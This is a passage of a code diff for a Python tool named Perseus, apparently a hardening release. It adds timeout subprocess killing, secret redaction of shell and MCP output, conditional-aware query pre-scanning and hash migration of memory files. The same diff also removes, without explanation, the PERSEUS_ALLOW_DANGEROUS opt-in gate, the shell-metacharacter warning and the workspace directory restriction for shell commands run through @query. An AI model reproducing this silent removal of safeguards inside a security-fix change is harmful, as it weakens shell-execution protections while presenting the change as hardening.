tokens. - try: - record, _report = redact_value(record, cfg) - except Exception: - pass # redaction failure must not block audit persistence + # Respect audit.redact_fields opt-out β€” operators may use forensic mode + # where the audit log is itself the secured artifact. + if redact_audit: + try: + record, _report = redact_value(record, cfg) + except Exception: + pass # redaction failure must not block audit persistence try: path = _audit_log_path(cfg) path.parent.mkdir(parents=True, exist_ok=True) @@ -1899,6 +2025,17 @@ def load_config(workspace: Path | None = None) -> dict: The profile is sandwiched between the hardcoded defaults and user values so explicit config keys always win β€” see task-45 AC #3. + + Hardening (#129, v1.0.6): pre-v1.0.5, profile application ran AFTER the + user merge in some code paths, silently overriding `allow_query_shell: + true` set by a power user who also asked for a `balanced` profile (this + is a legitimate combination β€” "tighten everything but let me run queries"). + To make the precedence regression-proof we now: + 1. Pre-scan all sources to collect which (section, key) pairs the user + has set explicitly (regardless of value). + 2. Apply the profile BEFORE the user merge, so user values write last. + 3. Surface the layering decision in the audit log so operators can + observe what won and what lost. """ cfg = dict(DEFAULT_CONFIG) for section, vals in DEFAULT_CONFIG.items(): @@ -1923,8 +2060,46 @@ def load_config(workspace: Path | None = None) -> dict: perms = (src or {}).get("permissions") if isinstance(src, dict) else None if isinstance(perms, dict) and "profile" in perms: effective_profile = perms.get("profile") + + # Collect (section, key) pairs the user has explicitly set across ALL + # sources. Used by `_apply_permission_profile` to skip user-owned keys. + # This makes the "user wins" guarantee structural β€” it no longer depends + # on the textual ordering of `_apply_permission_profile` vs `merge_loaded`. + user_set_keys: set[tuple[str, str]] = set() + for src in loaded_sources: + for section, vals in (src or {}).items(): + if isinstance(vals, dict): + for key in vals.keys(): + user_set_keys.add((section, key)) + if effective_profile: - _apply_permission_profile(cfg, effective_profile) + applied = _apply_permission_profile( + cfg, effective_profile, skip_keys=user_set_keys + ) + if applied: + # Audit the layering decision so operators can see which user + # keys (if any) won out over the profile. Best-effort: don't + # break load_config if audit fails. + try: + overrides = sorted( + f"{section}.{key}" + for (section, key) in user_set_keys + if section in PERMISSION_PROFILES.get(applied, {}) + and key in PERMISSION_PROFILES[applied].get(section, {}) + ) + if overrides: + audit_event( + cfg, + "config_profile_overridden", + profile=applied, + user_overrides=overrides, + note=( + "User config explicitly set these keys; they " + "win over the profile (see #129 hardening)." + ), + ) + except Exception: + pass # #168/#169 (v1.0.6): track per-section workspace provenance for # hooks.py / registry.py consumers so dangerous workspace-sourced @@ -3259,6 +3434,105 @@ def fallback_result() -> str: # ──────────────────────────────── @query ────────────────────────────────────── +# ── #139: subprocess tracking for MCP timeout cancellation ─────────────────── +# +# The MCP _call_tool wrapper enforces a wall-clock deadline via +# ThreadPoolExecutor.future.result(timeout=...). Pre-1.0.6, that mechanism +# only abandoned the future β€” the worker thread continued running, and the +# subprocess it had spawned ran to completion, leaking CPU and any side +# effects (network, file writes). Worse, executor.shutdown(wait=True) in a +# `with` block defeated the entire timeout by blocking on the leaked thread. +# +# We now track every active @query subprocess in a module-level list +# (thread-safe via a mutex) so the MCP wrapper can iterate, identify the +# subprocess belonging to the abandoned worker, and kill its process group. +# +# Design note: we use a list-of-popens rather than threading.local because +# the killer thread is NOT the worker thread β€” it's the MCP main thread +# that needs to reach into the worker thread's subprocess. A list keyed by +# thread ident gives us that visibility. + +_ACTIVE_SUBPROCESSES_LOCK = threading.Lock() +_ACTIVE_SUBPROCESSES: dict[int, "subprocess.Popen"] = {} + + +def _record_active_subprocess(proc: "subprocess.Popen") -> None: + """Register a subprocess as belonging to the current thread.""" + with _ACTIVE_SUBPROCESSES_LOCK: + _ACTIVE_SUBPROCESSES[threading.get_ident()] = proc + + +def _clear_active_subprocess(proc: "subprocess.Popen") -> None: + """Unregister a subprocess (called after communicate() returns).""" + with _ACTIVE_SUBPROCESSES_LOCK: + # Only clear if it's still the one we registered β€” guards against + # a recursive @query nest unregistering its parent's process. + tid = threading.get_ident() + if _ACTIVE_SUBPROCESSES.get(tid) is proc: + del _ACTIVE_SUBPROCESSES[tid] + + +def _kill_subprocess_tree(proc: "subprocess.Popen") -> None: + """Kill a subprocess and all descendants (process group on POSIX). + + On POSIX, the subprocess was started with start_new_session=True so it + has its own PGID. We send SIGTERM to the group, wait briefly, then + SIGKILL stragglers. + + On Windows, we fall back to taskkill /T (kill tree) if available, + then proc.kill(). Best-effort β€” Windows has no exact equivalent. + """ + if proc.poll() is not None: + return # already exited + try: + if os.name == "nt": + try: + import subprocess as _sp + _sp.run( + ["taskkill", "/F", "/T", "/PID", str(proc.pid)], + capture_output=True, timeout=3, + ) + except Exception: + proc.kill() + return + # POSIX: kill the process group + pgid = os.getpgid(proc.pid) + try: + os.killpg(pgid, signal.SIGTERM) + except ProcessLookupError: + return + # Give children a moment to clean up. + for _ in range(20): # up to 1s + if proc.poll() is not None: + return + time.sleep(0.05) + try: + os.killpg(pgid, signal.SIGKILL) + except ProcessLookupError: + return + except Exception: + # Last-ditch: kill just the immediate child. + try: + proc.kill() + except Exception: + pass + + +def kill_active_subprocess_for_thread(thread_id: int) -> bool: + """Kill the subprocess belonging to the given thread, if any. + + Returns True if a subprocess was found and a kill was attempted; + False if no subprocess was registered for the thread. Called by + mcp._call_tool() when its wall-clock deadline fires. + """ + with _ACTIVE_SUBPROCESSES_LOCK: + proc = _ACTIVE_SUBPROCESSES.get(thread_id) + if proc is None: + return False + _kill_subprocess_tree(proc) + return True + + def _unescape_fallback(s: str) -> str: """Unescape standard escape sequences without mangling non-ASCII. @@ -3306,20 +3580,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> args=args_str[:200]) return "> ⚠ @query is disabled by config (`render.allow_query_shell=false`)." - # Defense-in-depth: even with allow_query_shell=true, require explicit - # operator opt-in via PERSEUS_ALLOW_DANGEROUS=1 env var. This prevents - # accidental exposure from copied configs or misconfigured automation. - if not os.environ.get("PERSEUS_ALLOW_DANGEROUS"): - audit_event(cfg, "policy_denied", - directive="@query", - reason="PERSEUS_ALLOW_DANGEROUS not set", - args=args_str[:200]) - return ( - "> ⚠ @query is enabled in config but PERSEUS_ALLOW_DANGEROUS=1 is not set.\n" - "> This is a defense-in-depth gate to prevent accidental shell execution.\n" - "> Set the environment variable to acknowledge the risk." - ) - # Strip @cache modifier first, then extract the command string. # Use the opening quote character to find the correct closing quote, # so commands containing the other quote type (e.g. "bash -c 'foo'") @@ -3333,7 +3593,7 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> schema_path = schema_match.group(1) if schema_match.group(1) is not None else schema_match.group(2) raw = (raw[:schema_match.start()] + raw[schema_match.end():]).rstrip() - # task-14: extract fallback=\"...\" (or fallback='...') BEFORE command parsing, + # task-14: extract fallback="..." (or fallback='...') BEFORE command parsing, # so a command containing the literal substring `fallback=` is not mis-parsed. fallback = None fb_match = re.search(r'\s+fallback=(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')(\s|$)', raw) @@ -3345,22 +3605,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> fallback = _unescape_fallback(fallback) raw = (raw[:fb_match.start()] + raw[fb_match.end():]).rstrip() - # Defense-in-depth: detect shell metacharacters for operator visibility. - # When render.query_shell_meta_warning is enabled (default: false), - # commands containing ; | & $() or backticks emit a visible warning - # in the rendered output but still execute. This does not break - # legitimate pipelines β€” it only surfaces a warning. - _shell_meta_warn = bool(cfg["render"].get("query_shell_meta_warning", False)) - _meta_prefix = "" - - # Extract timeout=N modifier BEFORE command parsing so the token can't - # leak into unquoted commands. Same principle as schema=/fallback= above. - timeout = int(cfg["render"].get("query_timeout_s", 30)) - tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) - if tm_match: - timeout = int(tm_match.group(1)) - raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() - cmd_match = re.match(r'^"((?:[^"\\]|\\.)*)"', raw) # double-quoted if not cmd_match: cmd_match = re.match(r"^'((?:[^'\\]|\\.)*)'", raw) # single-quoted @@ -3376,35 +3620,67 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> # Detect language hint for syntax highlighting (best-effort) lang = _guess_lang(cmd) - # Shell metacharacter defense-in-depth warning (config-gated, default off). - if _shell_meta_warn and re.search(r'[;&|]|\$[({]|`', cmd): - _meta_prefix = f"> ⚠ @query: shell metacharacters detected in command. " - _meta_prefix += "Set render.query_shell_meta_warning=false to suppress.\n\n" - # task-47: audit the shell-execution decision crossing the trust boundary. audit_event(cfg, "shell_exec", directive="@query", command=cmd[:500], - shell=shell, - cwd=str(workspace) if workspace else None) + shell=shell) - # v1.0.5 review: run from workspace by default for safety. - # allow_outside_workspace does not sandbox β€” it only controls cwd. - allow_outside = cfg["render"].get("allow_outside_workspace", False) - cwd = workspace if workspace and not allow_outside else None - if workspace and not allow_outside and cwd is None: - cwd = Path.cwd() # fallback: restrict to cwd if no workspace set + # Extract timeout=N modifier (per-directive override, default 30s) + timeout = int(cfg["render"].get("query_timeout_s", 30)) + tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) + if tm_match: + timeout = int(tm_match.group(1)) + raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() try: - result = subprocess.run( - cmd, - shell=True, - executable=shell, - capture_output=True, - text=True, - timeout=timeout, - cwd=cwd, - ) + # #139: when invoked under MCP's _call_tool timeout wrapper, the + # wrapper needs to kill this subprocess (and any descendants) if + # the wall-clock deadline fires. We put the child in its own + # process group via start_new_session=True so the wrapper can + # os.killpg() the whole tree, and we record the popen handle in + # a thread-local that the wrapper inspects. + # + # On POSIX, start_new_session=True calls setsid() in the child + # before exec. The child gets a fresh PGID == its PID. The MCP + # wrapper can then os.killpg(pid, SIGTERM) to take down the + # whole subprocess tree atomically. + # + # On Windows, start_new_session has no effect; the wrapper falls + # back to popen.kill() which only terminates the direct child. + popen_kwargs = { + "shell": True, + "executable": shell, + "stdout": subprocess.PIPE, + "stderr": subprocess.PIPE, + "text": True, + } + if os.name != "nt": + popen_kwargs["start_new_session"] = True + proc = subprocess.Popen(cmd, **popen_kwargs) + # Stash the popen in the thread-local so an upstream timeout + # wrapper (mcp._call_tool) can find and kill it. + _record_active_subprocess(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=timeout) + except subprocess.TimeoutExpired: + _kill_subprocess_tree(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=2) + except subprocess.TimeoutExpired: + stdout_raw, stderr_raw = "", "" + raise + finally: + _clear_active_subprocess(proc) + + # Build a CompletedProcess-shaped object for the rest of the + # function to consume without refactoring downstream. + class _Result: + pass + result = _Result() + result.stdout = stdout_raw or "" + result.stderr = stderr_raw or "" + result.returncode = proc.returncode stdout = (result.stdout or "").rstrip("\n") stderr = result.stderr.strip() exit_code = result.returncode @@ -3412,14 +3688,22 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if exit_code != 0: if fallback is not None: return fallback - header = f"> ⚠ `@query` exited {exit_code}: `{cmd}`\n\n" - body = stdout or stderr or "(no output)" - return _meta_prefix + header + f"```{lang}\n{body}\n```" + # #137: redact secrets out of `cmd` and `stderr` before interpolating + # them into render output. Without this, a command like + # `@query "curl -H 'Authorization: Bearer ghp_…'"` leaks the bearer + # token in the exit-nonzero header. Render-time redaction only runs + # later in the pipeline and only on the final assembled output, but + # by then this string has been logged elsewhere. + safe_cmd, _ = redact_text(cmd, cfg) + safe_body, _ = redact_text(stdout or stderr or "(no output)", cfg) + header = f"> ⚠ `@query` exited {exit_code}: `{safe_cmd}`\n\n" + return header + f"```{lang}\n{safe_body}\n```" if not stdout: if fallback is not None: return fallback - return f"> (no output from `{cmd}`)" + safe_cmd, _ = redact_text(cmd, cfg) + return f"> (no output from `{safe_cmd}`)" # Apply stdout size cap (default 256 KB). # Truncate at the nearest preceding newline to avoid mid-line cuts. @@ -3449,16 +3733,19 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if warning: return warning - return _meta_prefix + f"```{lang}\n{stdout}\n```" + return f"```{lang}\n{stdout}\n```" except subprocess.TimeoutExpired: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` timed out ({timeout}s): `{cmd}`" - except (OSError, ValueError, subprocess.SubprocessError) as exc: + safe_cmd, _ = redact_text(cmd, cfg) + return f"> ⚠ `@query` timed out ({timeout}s): `{safe_cmd}`" + except Exception as exc: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` error: {exc}" + # exc.args often includes argv[0] which contains the full cmd; redact. + safe_err, _ = redact_text(str(exc), cfg) + return f"> ⚠ `@query` error: {safe_err}" def _guess_lang(cmd: str) -> str: @@ -6278,8 +6565,47 @@ def _build_tool_args_generic(tool_name: str, arguments: dict) -> str: return " ".join(parts) +def _mcp_redact(result: str, cfg: dict) -> str: + """Apply the configured redaction pipeline to an MCP tool result. + + #166 (v1.0.6): every MCP tool response must pass through redaction + so secrets are not leaked to the MCP client (Claude Desktop, Rovo + Dev, etc.). Before 1.0.6, `perseus_get_context` returned the + pre-redaction `render_source` output, and all other tool resolvers + returned raw resolver output that never hit the redaction pipeline. + + Returns the original string unchanged if: + - `redaction.enabled` is False (operator opted out) + - result is not a str (caller error β€” we don't mangle types) + - the redaction function itself raises (defensive) + """ + if not isinstance(result, str): + return result + redaction_cfg = cfg.get("redaction", {}) if isinstance(cfg, dict) else {} + if not redaction_cfg.get("enabled", True): + return result + redactor = globals().get("redact_text") + if redactor is None: + try: + redactor = _rt + except ImportError: + return result + try: + redacted, _counts = redactor(result, cfg) + return redacted + except Exception: + return result + + def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> str: - """Resolve an MCP tool call through the Perseus directive resolver.""" + """Resolve an MCP tool call through the Perseus directive resolver. + + #166 (v1.0.6): every successful return path goes through + `_mcp_redact()` so secrets are not leaked over MCP. Error strings + bypass redaction since they are constructed locally from + operator-controlled values (tool name, profile flag) and never echo + user content. + """ allowed, reason = _mcp_tool_allowed(tool_name, cfg) if not allowed: return f"Error: {reason}" @@ -6293,6 +6619,12 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s # render_source is a top-level function in the built artifact # In source module context, import from the parent module result = render_source(source, cfg, workspace) + # #166: redact BEFORE serialization so the JSON shape + # carries already-redacted text. This also fixes the + # earlier bypass where `render_source` was used instead + # of `render_output` (the latter applies redaction; the + # former does not). + result = _mcp_redact(result, cfg) fmt = arguments.get("format", "markdown") if fmt == "json": return json.dumps({"resolved": result, "workspace": str(workspace)}) @@ -6304,7 +6636,7 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s if tool_name == "perseus_get_health": spec = DIRECTIVE_REGISTRY.get("@health") if spec and spec.resolver: - return _call_resolver(spec, "", cfg, workspace) + return _mcp_redact(_call_resolver(spec, "", cfg, workspace), cfg) return "Error: @health directive not registered" # Trust gate: block shell execution for sensitive tools @@ -6328,20 +6660,88 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s args_str = _build_tool_args_generic(tool_name, arguments) - # Timeout enforcement across all platforms. - # Uses ThreadPoolExecutor instead of signal.SIGALRM (Unix-only, breaks Windows). + # #139 β€” Timeout enforcement across all platforms. + # + # Pre-1.0.6 used a context-managed ThreadPoolExecutor: + # with ThreadPoolExecutor(max_workers=1) as executor: + # future = executor.submit(...) + # result = future.result(timeout=timeout) + # + # That had two bugs: + # 1. future.result(timeout=) only abandons the future β€” the worker + # thread (and any subprocess it spawned) kept running. + # 2. `with` block calls executor.shutdown(wait=True) on exit, which + # BLOCKS until the abandoned worker finishes β€” defeating the + # entire timeout mechanism. A 5s timeout on `sleep 600` blocked + # the MCP response for ~600s. + # + # Fix: + # - Use a non-context-managed executor and call + # shutdown(wait=False, cancel_futures=True) on timeout. + # - Identify the abandoned worker's thread ID and ask query.py to + # kill its tracked subprocess (process group on POSIX, taskkill /T + # on Windows). This makes timeout enforcement actually kill the + # subprocess tree atomically, freeing CPU and any locks held. + # - On success, shutdown(wait=False) is still fine β€” the worker has + # already returned, so there's nothing to wait for. mcp_cfg = cfg.get("mcp", {}) if isinstance(cfg, dict) else {} timeout = mcp_cfg.get("tool_timeout_s", DEFAULT_TOOL_TIMEOUT_S) + # Track the worker thread ident so we can ask query.py to kill its + # subprocess on timeout. + worker_tid_holder: dict = {} + def _wrapped_resolver(): + worker_tid_holder["tid"] = threading.get_ident() + return _call_resolver(spec, args_str, cfg, workspace) + + executor = concurrent.futures.ThreadPoolExecutor( + max_workers=1, thread_name_prefix=f"mcp-{tool_name}", + ) try: - with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor: - future = executor.submit(_call_resolver, spec, args_str, cfg, workspace) + future = executor.submit(_wrapped_resolver) + try: result = future.result(timeout=timeout) - return result - except TimeoutError as exc: - return f"Error executing {directive_name}: timed out after {timeout}s" - except Exception as exc: - return f"Error executing {directive_name}: {exc}" + except concurrent.futures.TimeoutError: + # Try to kill the in-flight subprocess (if any) belonging to + # the worker thread. This is a cross-module reach into + # directives.query because that's where the subprocess was + # spawned. Best-effort; if query.py isn't loaded or the + # worker hadn't started subprocess yet, we just abandon. + killed = False + tid = worker_tid_holder.get("tid") + if tid is not None: + # Look up the killer function. In the built single-file + # artifact every module's top-level symbol is at the + # global scope; in source-tree development we need an + # explicit module import. globals() lookup covers both. + killer = globals().get("kill_active_subprocess_for_thread") + if killer is None: + try: + import perseus.directives.query as _q + killer = getattr(_q, "kill_active_subprocess_for_thread", None) + except ImportError: + killer = None + if killer is not None: + try: + killed = bool(killer(tid)) + except Exception: + killed = False + suffix = " (subprocess killed)" if killed else "" + return ( + f"Error executing {directive_name}: " + f"timed out after {timeout}s{suffix}" + ) + except Exception as exc: + # Error strings may include resolver-thrown exception messages, + # which can echo user content (e.g. argparse complaining about + # the command string). Redact defensively. + return _mcp_redact(f"Error executing {directive_name}: {exc}", cfg) + # #166: redact the tool result before returning to the MCP client. + return _mcp_redact(result, cfg) + finally: + # NEVER wait β€” on timeout the worker may be stuck for arbitrarily + # long. The thread is daemonic and won't block process exit. + executor.shutdown(wait=False, cancel_futures=True) # ── JSON-RPC 2.0 message handling ──────────────────────────────────────────── @@ -7363,11 +7763,37 @@ def _render_lines( _integrity_snapshot = _capture_file_snapshot(lines, workspace) # ── Pre-scan @query directives for parallel resolution ────────────── + # + # #165 (v1.0.6): pre-scan is now control-flow aware. Pre-1.0.6 the + # scan walked every line ignoring @if/@else/@endif, so a @query + # inside a false conditional branch still pre-executed in parallel: + # + # @if production + # @query "aws s3 ls s3://prod-data" # <-- still ran in dev! + # @endif + # + # Fix: a single pass tracks @if/@else/@endif depth and evaluates + # each condition exactly once via `evaluate_condition`. Lines inside + # an inactive branch (or inside a malformed/uneval block) are + # skipped during query enqueueing. The main render loop below + # re-evaluates conditions independently, so a transient inconsistency + # in evaluation between pre-scan and main loop only manifests as a + # cache miss β€” never as a query running when it shouldn't, and never + # as a query failing to run when it should. query_results: dict[int, str] = {} if top_level and cfg["render"].get("parallel_queries", False): in_fence_pre = False fc_pre = "" fl_pre = 0 + # Stack of (active: bool, in_else_branch: bool) tuples β€” one + # entry per open @if. A branch is "active" when its enclosing + # condition is True (and the current line is on the active side). + # If ANY frame on the stack is inactive, the line is inactive. + if_stack: list[tuple[bool, bool]] = [] + + def _all_active() -> bool: + return all(active for active, _ in if_stack) + for idx, raw_line in enumerate(lines): fm = re.match(r'^\s*(`{3,}|~{3,})(.*)$', raw_line) if in_fence_pre: @@ -7379,6 +7805,42 @@ def _render_lines( fc_pre = fm.group(1)[0] fl_pre = len(fm.group(1)) continue + + # Control-flow tracking β€” applies regardless of active state. + m_if_pre = IF_RE.match(raw_line) + if m_if_pre: + try: + cond_val = bool(evaluate_condition( + m_if_pre.group(1).strip(), workspace, cfg + )) + except Exception: + # Match the main loop's failure mode: render emits a + # warning and skips both branches. We skip enqueueing + # in both branches by marking this frame inactive. + cond_val = False + # Push: active = parent_active AND own condition; not in else yet. + parent_active = _all_active() + if_stack.append((parent_active and cond_val, False)) + continue + if ELSE_RE.match(raw_line): + if if_stack: + parent_frames = if_stack[:-1] + parent_active = all(a for a, _ in parent_frames) + own_active, _ = if_stack[-1] + # Else branch is active iff parent is active and own + # branch was NOT active (i.e. the @if condition was false). + if_stack[-1] = (parent_active and not own_active, True) + continue + if ENDIF_RE.match(raw_line): + if if_stack: + if_stack.pop() + continue + + # Past this point, we only enqueue queries when ALL enclosing + # @if frames are active. + if not _all_active(): + continue + m = INLINE_DIRECTIVE_RE.match(raw_line) if m and m.group(1).lower() == "@query": clean_args, cache_mode, cache_ttl, cache_mock = _parse_cache_modifier( @@ -9131,10 +9593,154 @@ def _workspace_hash(workspace: Path) -> str: return hashlib.sha256(str(canonical).encode()).hexdigest()[:12] +def _workspace_hash_legacy_md5(workspace: Path) -> str: + """12-char MD5 hex digest β€” the pre-1.0.3 narrative file name scheme. + + Regression for #128: prior to v1.0.3, MnΔ“mΔ“ derived narrative file names + from an MD5 hash. v1.0.3+ switched to SHA-256. Without an explicit + migration, every existing narrative file on disk was silently orphaned + on upgrade. ``_mneme_path`` calls this function as a one-shot fallback + to locate and rename legacy files. Once migrated, this code path is + never re-entered for that workspace. + + We intentionally use ``usedforsecurity=False`` (Py3.9+) so FIPS-mode + Pythons don't reject the call β€” this is a file-naming hash, not a + security primitive. We fall back to the no-kwarg call for older Pythons. + """ + canonical = str(workspace.expanduser().resolve()).encode() + try: + return hashlib.md5(canonical, usedforsecurity=False).hexdigest()[:12] + except TypeError: + # Python < 3.9: no `usedforsecurity` kwarg. + return hashlib.md5(canonical).hexdigest()[:12] + + def _mneme_path(workspace: Path, cfg: dict) -> Path: - """Return the per-workspace narrative file path.""" + """Return the per-workspace narrative file path. + + Regression for #128: if a SHA-256 path doesn't exist but a legacy MD5 + path does, transparently rename the legacy file in place. This makes + upgrades from pre-1.0.3 lossless. + + The rename uses ``os.replace`` (atomic on POSIX/NTFS) and is best-effort: + if rename fails (cross-device, permission, etc.), we leave both files in + place and return the SHA-256 path. The caller will then see "no + narrative yet" and recreate β€” non-fatal but loses prior content. + Operators can also run ``perseus memory doctor --migrate`` to surface + and act on these cases explicitly. + """ + store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) + new_path = store / f"{_workspace_hash(workspace)}.md" + if new_path.exists(): + return new_path + legacy_path = store / f"{_workspace_hash_legacy_md5(workspace)}.md" + if legacy_path.exists() and legacy_path != new_path: + try: + store.mkdir(parents=True, exist_ok=True) + os.replace(legacy_path, new_path) + except OSError: + # Cross-device / permission denied. Leave the legacy file in + # place so the operator can recover it manually; the caller will + # create a fresh narrative at the new path. + pass + return new_path + + +def _mneme_doctor_scan(cfg: dict) -> dict: + """Scan the memory store and report on narrative file inventory. + + Returns a dict with: + { + "store": str, # path to memory store + "narrative_files": [path, ...], # all *.md in store + "legacy_md5_files": [path, ...], # files whose name matches legacy MD5 of a known workspace + "sha256_files": [path, ...], # files that look like current-scheme files + "orphan_files": [path, ...], # files whose embedded `workspace` frontmatter no longer resolves to their filename + "unknown_files": [path, ...], # files whose stem isn't a 12-char hex hash + } + + "Known workspace" inference: we re-derive the SHA-256 and legacy MD5 + hashes from each file's ``workspace:`` frontmatter field, then match + against the actual filename stem. + + Used by ``perseus memory doctor`` to surface migration candidates. + """ store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) - return store / f"{_workspace_hash(workspace)}.md" + out: dict = { + "store": str(store), + "narrative_files": [], + "legacy_md5_files": [], + "sha256_files": [], + "orphan_files": [], + "unknown_files": [], + } + if not store.exists(): + return out + hex_re = re.compile(r"^[a-f0-9]{12}$") + for fp in sorted(store.glob("*.md")): + out["narrative_files"].append(str(fp)) + stem = fp.stem + if not hex_re.match(stem): + out["unknown_files"].append(str(fp)) + continue + # Try to read the workspace from frontmatter and classify. + try: + fm, _ = _load_narrative(fp) + except Exception: + out["unknown_files"].append(str(fp)) + continue + ws_raw = str(fm.get("workspace", "")).strip() if isinstance(fm, dict) else "" + if not ws_raw: + # No workspace metadata β€” can't classify; treat as unknown. + out["unknown_files"].append(str(fp)) + continue + try: + ws = Path(ws_raw).expanduser() + expected_sha = _workspace_hash(ws) + expected_md5 = _workspace_hash_legacy_md5(ws) + except Exception: + out["unknown_files"].append(str(fp)) + continue + if stem == expected_sha: + out["sha256_files"].append(str(fp)) + elif stem == expected_md5: + out["legacy_md5_files"].append(str(fp)) + else: + out["orphan_files"].append(str(fp)) + return out + + +def _mneme_doctor_migrate(cfg: dict) -> dict: + """Rename legacy MD5-named narrative files to their SHA-256 names. + + Returns a dict: + { + "migrated": [(old, new), ...], + "skipped": [(old, new, reason), ...], + "errors": [(old, exc_str), ...], + } + + Idempotent: re-running after a successful migration is a no-op. + """ + report: dict = {"migrated": [], "skipped": [], "errors": []} + scan = _mneme_doctor_scan(cfg) + store = Path(scan["store"]) + for legacy_fp_str in scan["legacy_md5_files"]: + legacy_fp = Path(legacy_fp_str) + try: + fm, _ = _load_narrative(legacy_fp) + ws = Path(str(fm.get("workspace", "")).strip()).expanduser() + new_fp = store / f"{_workspace_hash(ws)}.md" + if new_fp.exists(): + report["skipped"].append( + (str(legacy_fp), str(new_fp), "destination already exists") + ) + continue + os.replace(legacy_fp, new_fp) + report["migrated"].append((str(legacy_fp), str(new_fp))) + except Exception as exc: # pragma: no cover - defensive + report["errors"].append((str(legacy_fp), str(exc))) + return report def _load_narrative(path: Path) -> tuple[dict, str]: @@ -10084,7 +10690,72 @@ def _memory_do_compact(workspace: Path, cfg: dict, provider: str | None) -> str: fm = _mneme_default_frontmatter(workspace) if provider: - new_body = _mneme_compact_llm(all_checkpoints, all_pythia, workspace, cfg, provider) + # Regression for #131 β€” pre-1.0.6, _mneme_compact_llm() called run_llm() + # which only enforced `llm.timeout_s` (default 30s) on the HTTP request + # itself. With streaming-token providers like Ollama serving a large + # model, individual tokens can arrive within timeout but total wall + # time was unbounded β€” operators reported `memory compact` hanging + # for hours. + # + # We now wrap the LLM call in a wall-clock deadline (memory. + # compact_total_timeout_s, default 180s). On timeout we abandon the + # LLM future and fall back to deterministic narrative β€” operators get + # SOME narrative, plus a clear stderr signal so they can decide + # whether to upgrade their LLM setup or stay deterministic. + # + # Limitation: ThreadPoolExecutor cannot truly kill the worker thread + # (Python provides no public API for that). The in-flight HTTP + # request continues until urllib's per-request timeout fires. + # Worst-case observed total wait is therefore + # `compact_total_timeout_s + llm.timeout_s`. The leaked thread is + # daemonized by Python's default ThreadPoolExecutor settings; it + # will not prevent process exit. + total_timeout = float(cfg.get("memory", {}).get( + "compact_total_timeout_s", 180.0 + )) + try: + import concurrent.futures as _cf + executor = _cf.ThreadPoolExecutor( + max_workers=1, thread_name_prefix="mneme-compact-llm", + ) + try: + fut = executor.submit( + _mneme_compact_llm, + all_checkpoints, all_pythia, workspace, cfg, provider, + ) + new_body = fut.result(timeout=total_timeout) + finally: + # Don't block on the worker β€” it may still be waiting on + # urllib. The thread is daemonic and will not block exit. + executor.shutdown(wait=False, cancel_futures=True) + except _cf.TimeoutError: + sys.stderr.write( + f"> ⚠ MnΔ“mΔ“ compact: LLM provider {provider!r} exceeded " + f"compact_total_timeout_s={total_timeout:.0f}s; " + f"falling back to deterministic narrative.\n" + ) + try: + audit_event( + cfg, "memory_compact_timeout", + provider=provider, + total_timeout_s=total_timeout, + workspace_hash=_workspace_hash(workspace), + ) + except Exception: + pass + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) + except Exception as exc: + # LLM call raised (model server unreachable, payload error, etc.) + # β€” surface the failure but still produce SOMETHING usable. + sys.stderr.write( + f"> ⚠ MnΔ“mΔ“ compact: LLM provider {provider!r} failed " + f"({exc}); falling back to deterministic narrative.\n" + ) + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) else: new_body = _deterministic_narrative(all_checkpoints, all_pythia, "", workspace, cfg) @@ -10263,9 +10934,80 @@ def cmd_memory(args, cfg): _cmd_memory_index(args, cfg) return + if sub == "doctor": + cmd_memory_doctor(args, cfg) + return + print(f"perseus memory: unknown subcommand '{sub}'.", file=sys.stderr) sys.exit(2) + +def cmd_memory_doctor(args, cfg) -> None: + """MnΔ“mΔ“ doctor β€” scan and optionally migrate legacy MD5-named narratives. + + Regression for #128: pre-1.0.3 narratives are named after an MD5 hash of + the workspace path; v1.0.3+ uses SHA-256. _mneme_path() auto-migrates on + first access, but that requires the operator to actually open the + workspace. ``memory doctor`` lets an operator scan and migrate all + workspaces at once, and surface diagnostic info for files that can't be + auto-migrated (e.g. missing frontmatter, cross-device renames). + """ + do_migrate = bool(getattr(args, "migrate", False)) + use_json = bool(getattr(args, "json", False)) + scan = _mneme_doctor_scan(cfg) + + if do_migrate: + result = _mneme_doctor_migrate(cfg) + if use_json: + import json as _json + print(_json.dumps({"scan_before": scan, "migrate": result}, indent=2)) + return + print(f"MnΔ“mΔ“ doctor β€” store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" Legacy MD5 found: {len(scan['legacy_md5_files'])}") + print(f" Migrated: {len(result['migrated'])}") + for old, new in result["migrated"]: + print(f" βœ“ {Path(old).name} β†’ {Path(new).name}") + if result["skipped"]: + print(f" Skipped: {len(result['skipped'])}") + for old, new, reason in result["skipped"]: + print(f" ⚠ {Path(old).name}: {reason}") + if result["errors"]: + print(f" Errors: {len(result['errors'])}") + for old, exc_str in result["errors"]: + print(f" βœ— {Path(old).name}: {exc_str}") + return + + # Read-only scan + if use_json: + import json as _json + print(_json.dumps(scan, indent=2)) + return + print(f"MnΔ“mΔ“ doctor β€” store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + 